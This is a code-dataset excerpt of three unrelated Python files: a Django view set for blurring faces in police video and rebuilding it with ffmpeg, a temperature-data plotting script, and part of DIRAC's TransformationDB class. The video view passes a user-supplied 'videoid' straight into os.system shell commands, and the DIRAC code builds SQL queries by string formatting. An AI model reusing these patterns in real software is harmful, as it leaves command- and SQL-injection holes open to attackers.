m_norm = sum(abs(diff)) # Manhattan norm
z_norm = norm(diff.ravel(), 0) # Zero norm
return (m_norm, z_norm)
def to_grayscale(arr):
"If arr is a color image (3D array), convert it to grayscale (2D array)."
if len(arr.shape) == 3:
return average(arr, -1) # average over the last axis (color channels)
else:
return arr
def normalize(arr):
rng = arr.max()-arr.min()
amin = arr.min()
return (arr-amin)*255/rng
def compare(imageA, imageB):
# load the images -- the original, the original + contrast,
# and the original + photoshop
#imageA = cv2.imread(imageA)
#imageB = cv2.imread(imageB)
#imageA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)
#imageA = cv2.fastNlMeansDenoising(imageA,10,10,7,21)
imageA = cv2.Canny(imageA,100,200)
#imageB = cv2.fastNlMeansDenoisingColored(imageB,None,10,10,7,21)
# convert the images to grayscale
#imageA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)
#imageB = cv2.cvtColor(imageB, cv2.COLOR_BGR2GRAY)
#imageA = cv2.GaussianBlur(imageA,(3, 3), 30)
#imageB = cv2.GaussianBlur(imageA,(3, 3), 30)
# Make the two images the same size
def get_lowest(A, B):
if A < B:
return A
return B
heightA, widthA = imageA.shape[:2]
#print heightA, widthA
heightB, widthB = imageB.shape[:2]
#print heightB, widthB
height = get_lowest(heightA, heightB)
width = get_lowest(widthA, widthB)
#print height, width
imageA = imageA[0:height, 0: width]
imageB = imageB[0:height, 0: width]
#print "MSE", mse(imageA, imageB)
return ssim(imageA, imageB)
import numpy
from PIL import Image
import cv2
def similarness(image1,image2):
"""
Return the correlation distance be1tween the histograms. This is 'normalized' so that
1 is a perfect match while -1 is a complete mismatch and 0 is no match.
"""
# Open and resize images to 200x200
i1 = Image.open(image1).resize((200,200))
i2 = Image.open(image2).resize((200,200))
# Get histogram and seperate into RGB channels
i1hist = numpy.array(i1.histogram()).astype('float32')
i1r, i1b, i1g = i1hist[0:256], i1hist[256:256*2], i1hist[256*2:]
# Re bin the histogram from 256 bins to 48 for each channel
i1rh = numpy.array([sum(i1r[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
i1bh = numpy.array([sum(i1b[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
i1gh = numpy.array([sum(i1g[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
# Combine all the channels back into one array
i1histbin = numpy.ravel([i1rh, i1bh, i1gh]).astype('float32')
# Same steps for the second image
i2hist = numpy.array(i2.histogram()).astype('float32')
i2r, i2b, i2g = i2hist[0:256], i2hist[256:256*2], i2hist[256*2:]
i2rh = numpy.array([sum(i2r[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
i2bh = numpy.array([sum(i2b[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
i2gh = numpy.array([sum(i2g[i*16:16*(i+1)]) for i in range(16)]).astype('float32')
i2histbin = numpy.ravel([i2rh, i2bh, i2gh]).astype('float32')
return cv2.compareHist(i1histbin, i2histbin, 0)
@login_required
def compare_all_detected_to(request, compare_to):
import os
def c(A):
return compare(A, "media/detected_regions/frames/"+compare_to)
detections = os.listdir("media/detected_regions/frames/")
print len(detections)
comparisons = []
#compare_to = cv2.imread("media/detected_regions/frames/" + compare_to)
#compare_to = cv2.cvtColor(compare_to, cv2.COLOR_BGR2GRAY)
#compare_to = cv2.fastNlMeansDenoising(compare_to,10,10,7,21)
#compare_to = cv2.Canny(compare_to,100,200)
for i, imageA in enumerate(detections):
print i
#if i == 1000:
# break
score = similarness("media/detected_regions/frames/" + imageA, "media/detected_regions/frames/" + compare_to)
if score > .85:
comparisons.append((imageA, score))
#comparisons.append((imageA, compare(cv2.imread("media/detected_regions/frames/" + imageA), compare_to)))
return HttpResponse(json.dumps(sorted(comparisons, reverse=True, key=lambda x: x[1])), content_type="application/json")
#return HttpResponse(json.dumps(sorted([(imageA, c("media/detected_regions/frames/" + imageA)) for imageA in detections if c("media/detected_regions/frames/" + imageA) > 0.15], reverse=True, key=lambda x: x[1])), content_type="application/json")
@login_required
def apply_video_redactions(request):
import cv2
videoid = request.POST['videoid']
print request.POST
filenames = json.loads(request.POST['filenames'])
filenames = sorted(list(set(filenames)))
frames = [{'frame': filename[:5], 'filenames': [f for f in filenames if f.startswith(filename[:5])]} for filename in filenames]
for frame in frames:
iteml = []
#filename = '%05d.png' % (i)
current = os.getcwd()
# Get user supplied values
pieces = filename.replace('.png', '').split('_')
#print filename
basename = frame['frame']
imagePath = os.path.join(current, '../video_for_minimal_redaction/%s/%s' % (videoid, basename+'.png'))
print imagePath
# Read the image
image = cv2.imread(imagePath)
result_image = image.copy()
for filename in frame['filenames']:
pieces = filename.replace('.png', '').split('_')
# Draw a rectangle around the faces
print filename, map(int, pieces[2:])
x, y, w, h = map(int, pieces[2:])
#iteml.append((x, y, w, h))
#cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
sub_face = image[y:y+h, x:x+w]
# apply a gaussian blur on this new recangle image
sub_face = cv2.GaussianBlur(sub_face,(23, 23), 30)
# merge this blurry rectangle to our final image
result_image[y:y+sub_face.shape[0], x:x+sub_face.shape[1]] = sub_face
cv2.imwrite(os.path.join(current, '../video_for_minimal_redaction/%s/%s' % (videoid, basename+'.png')), result_image)
#cmd = 'ffmpeg -threads 0 -framerate 30/1 -i ../video_for_minimal_redaction/%s/%%05d.png -c:v libx264 -r 30 -pix_fmt yuv420p out.mp4' % (videoid)
os.system('rm media/out.mp4')
cmd = 'ffmpeg -threads 0 -framerate 30/1 -i ../video_for_minimal_redaction/%s/%%05d.png -r 30 -pix_fmt yuv420p media/out.mp4' % (videoid)
print cmd
os.system(cmd)
return HttpResponse('')
@login_required
def get_frames(request):
import os
frames = os.listdir('media/frames/')
return HttpResponse(json.dumps(sorted(frames)), content_type="application/json")
|
policevideorequests/policevideopublisher
|
webinterface/webinterface/views.py
|
Python
|
bsd-3-clause
| 30,481
|
[
"Gaussian"
] |
8cf8ba9c49434e5f3edd340a167077f6c5327e65a0a5eb7b50a8937f66c71029
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 5 12:39:59 2017
@author: Shabaka
"""
import os
import glob
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
from scipy import stats
# from mayavi import mlab
import multiprocessing
import plotly.plotly as py
import plotly.graph_objs as go
from plotly.graph_objs import Surface
path = r'C:\Users\Shabaka\Desktop\Test2 DJI_Corretti\100\TIM'
# path = r'C:\DRO\DCL_rawdata_files'
allFiles = glob.glob(path + "/*.csv")
# frame = pd.DataFrame()
list_TIM = []
for file_ in allFiles:
df_TIM = pd.read_csv(file_, index_col=None, header=0)
list_TIM.append(df_TIM)
frame = pd.concat(list_TIM) # ignore_index=True)
print(frame.head())
# sns.heatmap(frame.head())
plt.show()
temp = pd.read_csv('C:\\Users\\Shabaka\\Desktop\\Temperatura_Media.csv')
# Plot the aapl time series in blue
print(temp.head())
plt.plot(temp, color='blue', label='Temp_Median..(yr)')
plt.show()
# Plot the pairwise joint distributions grouped by 'origin' along with
# regression lines
# sns.pairplot(temp, kind='reg', hue='Temp_Med')
# plt.show()
# urb_pop_reader = pd.read_csv(filename, chunksize=1000)
"""
files = glob("*.txt")
fig, ax = plt.subplots()
for f in files:
print("Current file is"+f)
#your csv loading into data
data.plot('time','temp',ax=axes[0])
#outside of the for loop
plt.savefig("myplots.png")
"""
# ''''''''''''3D Density MAp Plot ''''''''''#
def calc_kde(data):
return kde(data.T)
mu, sigma = 0, 0.1
x = 10*np.random.normal(mu, sigma, 5000)
y = 10*np.random.normal(mu, sigma, 5000)
z = 10*np.random.normal(mu, sigma, 5000)
xyz = np.vstack([x, y, z])
kde = stats.gaussian_kde(xyz)
# Evaluate kde on a grid
xmin, ymin, zmin = x.min(), y.min(), z.min()
xmax, ymax, zmax = x.max(), y.max(), z.max()
xi, yi, zi = np.mgrid[xmin:xmax:30j, ymin:ymax:30j, zmin:zmax:30j]
coords = np.vstack([item.ravel() for item in [xi, yi, zi]])
# Multiprocessing
cores = multiprocessing.cpu_count()
pool = multiprocessing.Pool(processes=cores)
results = pool.map(calc_kde, np.array_split(coords.T, 2))
density = np.concatenate(results).reshape(xi.shape)
# Plot scatter with mayavi
figure = mlab.figure('DensityPlot')
grid = mlab.pipeline.scalar_field(xi, yi, zi, density)
min = density.min()
max = density.max()
mlab.pipeline.volume(grid, vmin=min, vmax=min + .5*(max-min))
mlab.axes()
mlab.show()
# '''''''' Alternativc Route'''''''''''''#
filename = 'C:\\Users\\Shabaka\\Desktop\\Temperatura_Media.csv'
raw_data = open(filename, 'rt')
tempdata = pd.read_csv(raw_data, header=0)
print(tempdata.shape)
print(tempdata.head())
plt.plot(tempdata, color='blue', label='Temp_Med')
plt.show()
sns.pairplot(tempdata, kind='reg') # hue='Temp_Med')
plt.show()
surfdata = [go.Surface(tempdata.as_matrix())]
layout = go.Layout(
title='Temp_Data Elevation',
autosize=False,
width=500,
height=500,
margin=dict(
l=65,
r=50,
b=65,
t=90
)
)
fig = go.Figure(data=surfdata, layout=layout)
py.iplot(fig, filename='elevations-3d-surface', type='surface')
plt.show()
|
qalhata/Python-Scripts-Repo-on-Data-Science
|
CSV_Concatenate_All.py
|
Python
|
gpl-3.0
| 3,117
|
[
"Mayavi"
] |
d24edd83a598a0e2f7d6291e2a031f6ad1ee0bfbb36fe4e7333f4a829ec8a167
|
""" DIRAC Transformation DB
Transformation database is used to collect and serve the necessary information
in order to automate the task of job preparation for high level transformations.
This class is typically used as a base class for more specific data processing
databases
"""
import re, time, threading, copy
from types import IntType, LongType, StringTypes, StringType, ListType, TupleType, DictType
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Base.DB import DB
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.Core.Utilities.List import stringListToString, intListToString, breakListIntoChunks
from DIRAC.Core.Utilities.Shifter import setupShifterProxyInEnv
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.Core.Utilities.Subprocess import pythonCall
__RCSID__ = "$Id$"
MAX_ERROR_COUNT = 10
#############################################################################
class TransformationDB( DB ):
""" TransformationDB class
"""
def __init__( self, dbname = None, dbconfig = None, maxQueueSize = 10, dbIn = None ):
""" The standard constructor takes the database name (dbname) and the name of the
configuration section (dbconfig)
"""
if not dbname:
dbname = 'TransformationDB'
if not dbconfig:
dbconfig = 'Transformation/TransformationDB'
if not dbIn:
DB.__init__( self, dbname, dbconfig, maxQueueSize )
self.lock = threading.Lock()
self.filters = ()
res = self.__updateFilters()
if not res['OK']:
gLogger.fatal( "Failed to create filters" )
self.allowedStatusForTasks = ( 'Unused', 'ProbInFC' )
self.TRANSPARAMS = [ 'TransformationID',
'TransformationName',
'Description',
'LongDescription',
'CreationDate',
'LastUpdate',
'AuthorDN',
'AuthorGroup',
'Type',
'Plugin',
'AgentType',
'Status',
'FileMask',
'TransformationGroup',
'GroupSize',
'InheritedFrom',
'Body',
'MaxNumberOfTasks',
'EventsPerTask',
'TransformationFamily']
self.mutable = [ 'TransformationName',
'Description',
'LongDescription',
'AgentType',
'Status',
'MaxNumberOfTasks',
'TransformationFamily',
'Body'] # for the moment include TransformationFamily
self.TRANSFILEPARAMS = ['TransformationID',
'FileID',
'Status',
'TaskID',
'TargetSE',
'UsedSE',
'ErrorCount',
'LastUpdate',
'InsertedTime']
self.TRANSFILETASKPARAMS = ['TransformationID',
'FileID',
'TaskID']
self.TASKSPARAMS = [ 'TaskID',
'TransformationID',
'ExternalStatus',
'ExternalID',
'TargetSE',
'CreationTime',
'LastUpdateTime']
self.ADDITIONALPARAMETERS = ['TransformationID',
'ParameterName',
'ParameterValue',
'ParameterType'
]
# This is here to ensure full compatibility between different versions of the MySQL DB schema
self.isTransformationTasksInnoDB = True
res = self._query( "SELECT Engine FROM INFORMATION_SCHEMA.TABLES WHERE table_name = 'TransformationTasks'" )
if not res['OK']:
raise RuntimeError, res['Message']
else:
engine = res['Value'][0][0]
if engine.lower() != 'innodb':
self.isTransformationTasksInnoDB = False
def getName( self ):
""" Get the database name
"""
return self.dbName
###########################################################################
#
# These methods manipulate the Transformations table
#
def addTransformation( self, transName, description, longDescription, authorDN, authorGroup, transType,
plugin, agentType, fileMask,
transformationGroup = 'General',
groupSize = 1,
inheritedFrom = 0,
body = '',
maxTasks = 0,
eventsPerTask = 0,
addFiles = True,
connection = False ):
""" Add new transformation definition including its input streams
"""
connection = self.__getConnection( connection )
res = self._getTransformationID( transName, connection = connection )
if res['OK']:
return S_ERROR( "Transformation with name %s already exists with TransformationID = %d" % ( transName,
res['Value'] ) )
elif res['Message'] != "Transformation does not exist":
return res
self.lock.acquire()
res = self._escapeString( body )
if not res['OK']:
return S_ERROR( "Failed to parse the transformation body" )
body = res['Value']
req = "INSERT INTO Transformations (TransformationName,Description,LongDescription, \
CreationDate,LastUpdate,AuthorDN,AuthorGroup,Type,Plugin,AgentType,\
FileMask,Status,TransformationGroup,GroupSize,\
InheritedFrom,Body,MaxNumberOfTasks,EventsPerTask)\
VALUES ('%s','%s','%s',\
UTC_TIMESTAMP(),UTC_TIMESTAMP(),'%s','%s','%s','%s','%s',\
'%s','New','%s',%d,\
%d,%s,%d,%d);" % \
( transName, description, longDescription,
authorDN, authorGroup, transType, plugin, agentType,
fileMask, transformationGroup, groupSize,
inheritedFrom, body, maxTasks, eventsPerTask )
res = self._update( req, connection )
if not res['OK']:
self.lock.release()
return res
transID = res['lastRowId']
self.lock.release()
# If the transformation has an input data specification
if fileMask:
self.filters.append( ( transID, re.compile( fileMask ) ) )
if inheritedFrom:
res = self._getTransformationID( inheritedFrom, connection = connection )
if not res['OK']:
gLogger.error( "Failed to get ID for parent transformation: %s, now deleting" % res['Message'] )
return self.deleteTransformation( transID, connection = connection )
originalID = res['Value']
# FIXME: this is not the right place to change status information, and in general the whole should not be here
res = self.setTransformationParameter( originalID, 'Status', 'Completing',
author = authorDN, connection = connection )
if not res['OK']:
gLogger.error( "Failed to update parent transformation status: %s, now deleting" % res['Message'] )
return self.deleteTransformation( transID, connection = connection )
message = 'Creation of the derived transformation (%d)' % transID
self.__updateTransformationLogging( originalID, message, authorDN, connection = connection )
res = self.getTransformationFiles( condDict = {'TransformationID':originalID}, connection = connection )
if not res['OK']:
gLogger.error( "Could not get transformation files: %s, now deleting" % res['Message'] )
return self.deleteTransformation( transID, connection = connection )
if res['Records']:
res = self.__insertExistingTransformationFiles( transID, res['Records'], connection = connection )
if not res['OK']:
gLogger.error( "Could not insert files: %s, now deleting" % res['Message'] )
return self.deleteTransformation( transID, connection = connection )
if addFiles and fileMask:
self.__addExistingFiles( transID, connection = connection )
message = "Created transformation %d" % transID
self.__updateTransformationLogging( transID, message, authorDN, connection = connection )
return S_OK( transID )
def getTransformations( self, condDict = {}, older = None, newer = None, timeStamp = 'LastUpdate',
orderAttribute = None, limit = None, extraParams = False, offset = None, connection = False ):
""" Get parameters of all the Transformations with support for the web standard structure """
connection = self.__getConnection( connection )
req = "SELECT %s FROM Transformations %s" % ( intListToString( self.TRANSPARAMS ),
self.buildCondition( condDict, older, newer, timeStamp,
orderAttribute, limit, offset = offset ) )
res = self._query( req, connection )
if not res['OK']:
return res
webList = []
resultList = []
for row in res['Value']:
# Prepare the structure for the web
rList = []
transDict = {}
count = 0
for item in row:
transDict[self.TRANSPARAMS[count]] = item
count += 1
if type( item ) not in [IntType, LongType]:
rList.append( str( item ) )
else:
rList.append( item )
webList.append( rList )
if extraParams:
res = self.__getAdditionalParameters( transDict['TransformationID'], connection = connection )
if not res['OK']:
return res
transDict.update( res['Value'] )
resultList.append( transDict )
result = S_OK( resultList )
result['Records'] = webList
result['ParameterNames'] = copy.copy( self.TRANSPARAMS )
return result
def getTransformation( self, transName, extraParams = False, connection = False ):
"""Get Transformation definition and parameters of Transformation identified by TransformationID
"""
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.getTransformations( condDict = {'TransformationID':transID}, extraParams = extraParams,
connection = connection )
if not res['OK']:
return res
if not res['Value']:
return S_ERROR( "Transformation %s did not exist" % transName )
return S_OK( res['Value'][0] )
def getTransformationParameters( self, transName, parameters, connection = False ):
""" Get the requested parameters for a supplied transformation """
if type( parameters ) in StringTypes:
parameters = [parameters]
extraParams = False
for param in parameters:
if not param in self.TRANSPARAMS:
extraParams = True
res = self.getTransformation( transName, extraParams = extraParams, connection = connection )
if not res['OK']:
return res
transParams = res['Value']
paramDict = {}
for reqParam in parameters:
if not reqParam in transParams.keys():
return S_ERROR( "Parameter %s not defined for transformation" % reqParam )
paramDict[reqParam] = transParams[reqParam]
if len( paramDict ) == 1:
return S_OK( paramDict[reqParam] )
return S_OK( paramDict )
def getTransformationWithStatus( self, status, connection = False ):
""" Gets a list of the transformations with the supplied status """
req = "SELECT TransformationID FROM Transformations WHERE Status = '%s';" % status
res = self._query( req, conn = connection )
if not res['OK']:
return res
transIDs = []
for tupleIn in res['Value']:
transIDs.append( tupleIn[0] )
return S_OK( transIDs )
def getTableDistinctAttributeValues( self, table, attributes, selectDict, older = None, newer = None,
timeStamp = None, connection = False ):
tableFields = { 'Transformations' : self.TRANSPARAMS,
'TransformationTasks' : self.TASKSPARAMS,
'TransformationFiles' : self.TRANSFILEPARAMS}
possibleFields = tableFields.get( table, [] )
return self.__getTableDistinctAttributeValues( table, possibleFields, attributes, selectDict, older, newer,
timeStamp, connection = connection )
def __getTableDistinctAttributeValues( self, table, possible, attributes, selectDict, older, newer,
timeStamp, connection = False ):
connection = self.__getConnection( connection )
attributeValues = {}
for attribute in attributes:
if possible and ( not attribute in possible ):
return S_ERROR( 'Requested attribute (%s) does not exist in table %s' % ( attribute, table ) )
res = self.getDistinctAttributeValues( table, attribute, condDict = selectDict, older = older, newer = newer,
timeStamp = timeStamp, connection = connection )
if not res['OK']:
return S_ERROR( 'Failed to serve values for attribute %s in table %s' % ( attribute, table ) )
attributeValues[attribute] = res['Value']
return S_OK( attributeValues )
def __updateTransformationParameter( self, transID, paramName, paramValue, connection = False ):
if not ( paramName in self.mutable ):
return S_ERROR( "Can not update the '%s' transformation parameter" % paramName )
if paramName == 'Body':
res = self._escapeString( paramValue )
if not res['OK']:
return S_ERROR( "Failed to parse parameter value" )
paramValue = res['Value']
req = "UPDATE Transformations SET %s=%s, LastUpdate=UTC_TIMESTAMP() WHERE TransformationID=%d" % ( paramName,
paramValue,
transID )
return self._update( req, connection )
req = "UPDATE Transformations SET %s='%s', LastUpdate=UTC_TIMESTAMP() WHERE TransformationID=%d" % ( paramName,
paramValue,
transID )
return self._update( req, connection )
def _getTransformationID( self, transName, connection = False ):
""" Method returns ID of transformation with the name=<name> """
try:
transName = long( transName )
cmd = "SELECT TransformationID from Transformations WHERE TransformationID=%d;" % transName
except:
if type( transName ) not in StringTypes:
return S_ERROR( "Transformation should ID or name" )
cmd = "SELECT TransformationID from Transformations WHERE TransformationName='%s';" % transName
res = self._query( cmd, connection )
if not res['OK']:
gLogger.error( "Failed to obtain transformation ID for transformation", "%s:%s" % ( transName, res['Message'] ) )
return res
elif not res['Value']:
gLogger.verbose( "Transformation %s does not exist" % ( transName ) )
return S_ERROR( "Transformation does not exist" )
return S_OK( res['Value'][0][0] )
def __deleteTransformation( self, transID, connection = False ):
req = "DELETE FROM Transformations WHERE TransformationID=%d;" % transID
return self._update( req, connection )
def __updateFilters( self, connection = False ):
""" Get filters for all defined input streams in all the transformations.
If transID argument is given, get filters only for this transformation.
"""
resultList = []
# Define the general filter first
self.database_name = self.__class__.__name__
value = Operations().getValue( 'InputDataFilter/%sFilter' % self.database_name, '' )
if value:
refilter = re.compile( value )
resultList.append( ( 0, refilter ) )
# Per transformation filters
req = "SELECT TransformationID,FileMask FROM Transformations;"
res = self._query( req, connection )
if not res['OK']:
return res
for transID, mask in res['Value']:
if mask:
refilter = re.compile( mask )
resultList.append( ( transID, refilter ) )
self.filters = resultList
return S_OK( resultList )
def __filterFile( self, lfn, filters = None ):
"""Pass the input file through a supplied filter or those currently active """
result = []
if filters:
for transID, refilter in filters:
if refilter.search( lfn ):
result.append( transID )
else:
for transID, refilter in self.filters:
if refilter.search( lfn ):
result.append( transID )
return result
###########################################################################
#
# These methods manipulate the AdditionalParameters tables
#
def setTransformationParameter( self, transName, paramName, paramValue, author = '', connection = False ):
""" Add a parameter for the supplied transformations """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
message = ''
if paramName in self.TRANSPARAMS:
res = self.__updateTransformationParameter( transID, paramName, paramValue, connection = connection )
if res['OK']:
pv = self._escapeString( paramValue )
if not pv['OK']:
return S_ERROR( "Failed to parse parameter value" )
paramValue = pv['Value']
message = '%s updated to %s' % ( paramName, paramValue )
else:
res = self.__addAdditionalTransformationParameter( transID, paramName, paramValue, connection = connection )
if res['OK']:
message = 'Added additional parameter %s' % paramName
if message:
self.__updateTransformationLogging( transID, message, author, connection = connection )
return res
def getAdditionalParameters( self, transName, connection = False ):
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
return self.__getAdditionalParameters( transID, connection = connection )
def deleteTransformationParameter( self, transName, paramName, author = '', connection = False ):
""" Delete a parameter from the additional parameters table """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
if paramName in self.TRANSPARAMS:
return S_ERROR( "Can not delete core transformation parameter" )
res = self.__deleteTransformationParameters( transID, parameters = [paramName], connection = connection )
if not res['OK']:
return res
self.__updateTransformationLogging( transID, 'Removed additional parameter %s' % paramName, author,
connection = connection )
return res
def __addAdditionalTransformationParameter( self, transID, paramName, paramValue, connection = False ):
req = "DELETE FROM AdditionalParameters WHERE TransformationID=%d AND ParameterName='%s'" % ( transID, paramName )
res = self._update( req, connection )
if not res['OK']:
return res
res = self._escapeString( paramValue )
if not res['OK']:
return S_ERROR( "Failed to parse parameter value" )
paramValue = res['Value']
paramType = 'StringType'
if type( paramValue ) in [IntType, LongType]:
paramType = 'IntType'
req = "INSERT INTO AdditionalParameters (%s) VALUES (%s,'%s',%s,'%s');" % ( ', '.join( self.ADDITIONALPARAMETERS ),
transID, paramName,
paramValue, paramType )
return self._update( req, connection )
def __getAdditionalParameters( self, transID, connection = False ):
req = "SELECT %s FROM AdditionalParameters WHERE TransformationID = %d" % ( ', '.join( self.ADDITIONALPARAMETERS ),
transID )
res = self._query( req, connection )
if not res['OK']:
return res
paramDict = {}
for transID, parameterName, parameterValue, parameterType in res['Value']:
parameterType = eval( parameterType )
if parameterType in [IntType, LongType]:
parameterValue = int( parameterValue )
paramDict[parameterName] = parameterValue
return S_OK( paramDict )
def __deleteTransformationParameters( self, transID, parameters = [], connection = False ):
""" Remove the parameters associated to a transformation """
req = "DELETE FROM AdditionalParameters WHERE TransformationID=%d" % transID
if parameters:
req = "%s AND ParameterName IN (%s);" % ( req, stringListToString( parameters ) )
return self._update( req, connection )
###########################################################################
#
# These methods manipulate the TransformationFiles table
#
def addFilesToTransformation( self, transName, lfns, connection = False ):
""" Add a list of LFNs to the transformation directly """
if not lfns:
return S_ERROR( 'Zero length LFN list' )
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.__getFileIDsForLfns( lfns, connection = connection )
if not res['OK']:
return res
fileIDs, _lfnFilesIDs = res['Value']
failed = {}
successful = {}
missing = []
fileIDsValues = set( fileIDs.values() )
for lfn in lfns:
if lfn not in fileIDsValues:
missing.append( lfn )
if missing:
res = self.__addDataFiles( missing, connection = connection )
if not res['OK']:
return res
for lfn, fileID in res['Value'].items():
fileIDs[fileID] = lfn
# must update the fileIDs
if fileIDs:
res = self.__addFilesToTransformation( transID, fileIDs.keys(), connection = connection )
if not res['OK']:
return res
for fileID in fileIDs.keys():
lfn = fileIDs[fileID]
successful[lfn] = "Present"
if fileID in res['Value']:
successful[lfn] = "Added"
resDict = {'Successful':successful, 'Failed':failed}
return S_OK( resDict )
def getTransformationFiles( self, condDict = {}, older = None, newer = None, timeStamp = 'LastUpdate',
orderAttribute = None, limit = None, offset = None, connection = False ):
""" Get files for the supplied transformations with support for the web standard structure """
connection = self.__getConnection( connection )
req = "SELECT %s FROM TransformationFiles" % ( intListToString( self.TRANSFILEPARAMS ) )
originalFileIDs = {}
if condDict or older or newer:
if condDict.has_key( 'LFN' ):
lfns = condDict.pop( 'LFN' )
if type( lfns ) in StringTypes:
lfns = [lfns]
res = self.__getFileIDsForLfns( lfns, connection = connection )
if not res['OK']:
return res
originalFileIDs, _ignore = res['Value']
condDict['FileID'] = originalFileIDs.keys()
for val in condDict.itervalues():
if not val:
return S_OK( [] )
req = "%s %s" % ( req, self.buildCondition( condDict, older, newer, timeStamp, orderAttribute, limit,
offset = offset ) )
res = self._query( req, connection )
if not res['OK']:
return res
transFiles = res['Value']
fileIDs = [int( row[1] ) for row in transFiles]
webList = []
resultList = []
if not fileIDs:
originalFileIDs = {}
else:
if not originalFileIDs:
res = self.__getLfnsForFileIDs( fileIDs, connection = connection )
if not res['OK']:
return res
originalFileIDs = res['Value'][1]
for row in transFiles:
lfn = originalFileIDs[row[1]]
# Prepare the structure for the web
rList = [lfn]
fDict = {}
fDict['LFN'] = lfn
count = 0
for item in row:
fDict[self.TRANSFILEPARAMS[count]] = item
count += 1
if type( item ) not in [IntType, LongType]:
rList.append( str( item ) )
else:
rList.append( item )
webList.append( rList )
resultList.append( fDict )
result = S_OK( resultList )
# result['LFNs'] = originalFileIDs.values()
result['Records'] = webList
result['ParameterNames'] = ['LFN'] + self.TRANSFILEPARAMS
return result
def getFileSummary( self, lfns, connection = False ):
""" Get file status summary in all the transformations """
connection = self.__getConnection( connection )
condDict = {'LFN':lfns}
res = self.getTransformationFiles( condDict = condDict, connection = connection )
if not res['OK']:
return res
resDict = {}
for fileDict in res['Value']:
lfn = fileDict['LFN']
transID = fileDict['TransformationID']
if not resDict.has_key( lfn ):
resDict[lfn] = {}
if not resDict[lfn].has_key( transID ):
resDict[lfn][transID] = {}
resDict[lfn][transID] = fileDict
failedDict = {}
for lfn in lfns:
if not resDict.has_key( lfn ):
failedDict[lfn] = 'Did not exist in the Transformation database'
return S_OK( {'Successful':resDict, 'Failed':failedDict} )
def setFileStatusForTransformation( self, transID, fileStatusDict = {}, connection = False ):
""" Set file status for the given transformation, based on
fileStatusDict {fileID_A: 'statusA', fileID_B: 'statusB', ...}
The ErrorCount is incremented automatically here
"""
if not fileStatusDict:
return S_OK()
# Building the request with "ON DUPLICATE KEY UPDATE"
req = "INSERT INTO TransformationFiles (TransformationID, FileID, Status, ErrorCount, LastUpdate) VALUES "
updatesList = []
for fileID, status in fileStatusDict.items():
updatesList.append( "(%d, %d, '%s', 0, UTC_TIMESTAMP())" % ( transID, fileID, status ) )
req += ','.join( updatesList )
req += " ON DUPLICATE KEY UPDATE Status=VALUES(Status),ErrorCount=ErrorCount+1,LastUpdate=VALUES(LastUpdate)"
return self._update( req, connection )
def getTransformationStats( self, transName, connection = False ):
""" Get number of files in Transformation Table for each status """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.getCounters( 'TransformationFiles', ['TransformationID', 'Status'], {'TransformationID':transID} )
if not res['OK']:
return res
statusDict = {}
total = 0
for attrDict, count in res['Value']:
status = attrDict['Status']
if not re.search( '-', status ):
statusDict[status] = count
total += count
statusDict['Total'] = total
return S_OK( statusDict )
def getTransformationFilesCount( self, transName, field, selection = {}, connection = False ):
""" Get the number of files in the TransformationFiles table grouped by the supplied field """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
selection['TransformationID'] = transID
if field not in self.TRANSFILEPARAMS:
return S_ERROR( "Supplied field not in TransformationFiles table" )
res = self.getCounters( 'TransformationFiles', ['TransformationID', field], selection )
if not res['OK']:
return res
countDict = {}
total = 0
for attrDict, count in res['Value']:
countDict[attrDict[field]] = count
total += count
countDict['Total'] = total
return S_OK( countDict )
def __addFilesToTransformation( self, transID, fileIDs, connection = False ):
req = "SELECT FileID from TransformationFiles"
req = req + " WHERE TransformationID = %d AND FileID IN (%s);" % ( transID, intListToString( fileIDs ) )
res = self._query( req, connection )
if not res['OK']:
return res
for tupleIn in res['Value']:
fileIDs.remove( tupleIn[0] )
if not fileIDs:
return S_OK( [] )
req = "INSERT INTO TransformationFiles (TransformationID,FileID,LastUpdate,InsertedTime) VALUES"
for fileID in fileIDs:
req = "%s (%d,%d,UTC_TIMESTAMP(),UTC_TIMESTAMP())," % ( req, transID, fileID )
req = req.rstrip( ',' )
res = self._update( req, connection )
if not res['OK']:
return res
return S_OK( fileIDs )
def __addExistingFiles( self, transID, connection = False ):
""" Add files that already exist in the DataFiles table to the transformation specified by the transID
"""
for tID, _filter in self.filters:
if tID == transID:
filters = [( tID, filter )]
break
if not filters:
return S_ERROR( 'No filters defined for transformation %d' % transID )
res = self.__getAllFileIDs( connection = connection )
if not res['OK']:
return res
fileIDs, _lfnFilesIDs = res['Value']
passFilter = []
for fileID, lfn in fileIDs.items():
if self.__filterFile( lfn, filters ):
passFilter.append( fileID )
return self.__addFilesToTransformation( transID, passFilter, connection = connection )
def __insertExistingTransformationFiles( self, transID, fileTuplesList, connection = False ):
""" Inserting already transformation files in TransformationFiles table (e.g. for deriving transformations)
"""
gLogger.info( "Inserting %d files in TransformationFiles" % len( fileTuplesList ) )
# splitting in various chunks, in case it is too big
for fileTuples in breakListIntoChunks( fileTuplesList, 10000 ):
